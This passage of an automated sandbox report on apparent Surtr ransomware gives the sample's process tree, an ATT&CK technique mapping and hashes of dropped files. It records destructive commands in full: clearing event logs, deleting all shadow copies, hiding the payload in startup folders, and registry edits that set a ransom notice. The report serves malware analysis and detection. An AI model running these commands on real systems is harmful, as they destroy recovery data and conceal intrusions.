                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:2508
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                                                                                                                        wevtutil.exe cl System
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:1876
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:2452
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                                                                                                                          wevtutil.exe cl Application
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                          PID:1656
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:4320
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                                                                                                                            wevtutil.exe cl Security
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                            PID:2216
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c wevtutil.exe sl Security /e:false
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:2772
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                                                                                                                              wevtutil.exe sl Security /e:false
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                              PID:2264
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:4292
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                PID:2768
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:2564
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:2672
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:2520
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:2260
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:972
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:864
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:2532
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                              reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:3220
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Service\Surtr.exe"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:4388
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                  attrib +h +s "C:\ProgramData\Service\Surtr.exe"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                  PID:2392
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c attrib +h +s "%TEMP%\Service\Surtr.exe"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1264
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                    attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe"
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                    PID:4088
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:2336
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                      attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                      PID:2664
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:2680
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                        attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                        PID:4456
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:3680
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                          attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                          PID:4464
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c attrib +h C:\ProgramData\Service\SurtrIcon.ico
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:2328
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                            attrib +h C:\ProgramData\Service\SurtrIcon.ico
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                            PID:2316
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:4492
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                              reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:2476
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:3460
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                  reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:3768
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:3596
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                      reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:3800
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:4040
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                        PID:2224
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:3172
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                          vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                          PID:2228
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:2600
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                        PID:2372
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-1450380267-409625918-2105801888-383792174-643724100402355456-14993441931919315720"
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:1696
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                          PID:3388
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:3840
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:2172

                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                                            Command-Line Interface

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1059

                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                                            Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1088

                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                            Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1088

                                                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                            Indicator Removal on Host

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1070

                                                                                                                                                                                                                                                                                                                                            File Deletion

                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                            T1107

                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                            Impact

                                                                                                                                                                                                                                                                                                                                            Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                                                            T1490

                                                                                                                                                                                                                                                                                                                                            Data Destruction

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1485

                                                                                                                                                                                                                                                                                                                                            Defacement

                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                            T1491

                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              664cf36657bf55f20cac44505d3bbb2c

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              a48f8089455201895757503255d0f573ce5d3c66

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Service\ID_DATA.surt
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              d02cade5c1abb4f3ca84ef7dcde37d99

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              f6fd62c0be0301d9c04bdb982475fa8cf5afe308

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              f7d9aab42f7ace31be462f7f90708b395237c2fbd29fc5f0693b24fe6a3a06c1

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              93374cdabd00e2a17551213cc5ecff6a48487501ab299c5a41e64ecd4365a632dbf9f81dc69ab0d0490cf89c912e5773abee7f2494ac665d2feb6df6b33c9e09

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Service\PrivateData_jic101rxx5u76w.surt
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              38394285e6dca15405584d4ad602332e

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              3c68605114fea74a898b45d38f15c784c7eaec90

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              6181977fa6bb19af96c50e817126109092007b597ec2ecd409eff6c46cd733a3

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              cbae33d3499cdacf194d508eb8877e70417fd9094d53b1c0941652c1b6857adb3d41845dbc76e24cf589de1f9461685200c6cbea45dc5750be7ac590e2ff5f54

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Service\PublicData_jic101rxx5u76w.surt
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              099013a70fd25f346ede77200ce7e904

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              63b893c193633a2c5475e1d6508e75c38a4d1c55

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              76d534eaaed875423759a49237a3c177828261beef10e2f40dffeff5feee2486

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              3c0f57a7ebd13a88b1d0fb11fcf8eac0c3028828539ed9f31499847da5eb6c4391786cc9c713bcde3b84f1c33721827c015df900a8ee79e6f6f04b1f3b6f0166

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Service\SURTR_README.hta
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              5595c682f970042063bc6d305622b003

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              4f50dc63a6929a085e0de69cfbd247fe05086dee

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              74a031c085cd43b91838a5295e9a5487884f8e5c4ab2ccf602ed8d9cbe0dba40

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              c11b4765b7dcdc24ae3de35c2d46d2e45849ae2de9c21cc5b9cca89911c7ab0948a9f70d57f53a20c21f5ecd7182ab90832f0d0fcf38668c9b38bf2ce3520325

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Service\SURTR_README.txt
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              804c71f394c60a757714548bf1f4e8fe

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              cc9df26789e4c334d07a63efc7969ffdbaae3957

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              77be03126a634e7aef9145b4ece130f84cdc2a8e74bb3f87e38ad8fff04204f4

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              2381deca9f0dcc530e1e5b0c53c4c9f098f8b78f857471efaf528a6700d5ae644a60ceeb6bdd2d525e04592cf2a7949f36962c6c9e9c69177d919ab77812fa60

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Service\Surtr.exe
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              664cf36657bf55f20cac44505d3bbb2c

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              a48f8089455201895757503255d0f573ce5d3c66

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Service\SurtrBackGround.jpg
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              33f7fc301be9d39fcb474fb8b1e5f42e

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              a3bf9ddb2ac53bc4b12b249825189a7c7a07b766

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Service\SurtrIcon.ico
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              3257eb22824b57fe3d58074bca3128d3

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              664cf36657bf55f20cac44505d3bbb2c

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              a48f8089455201895757503255d0f573ce5d3c66

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe
                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              664cf36657bf55f20cac44505d3bbb2c

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              a48f8089455201895757503255d0f573ce5d3c66

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

                                                                                                                                                                                                                                                                                                                                            • memory/1592-54-0x0000000075F71000-0x0000000075F73000-memory.dmp
                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                            • memory/2544-55-0x000007FEFC1E1000-0x000007FEFC1E3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              8KB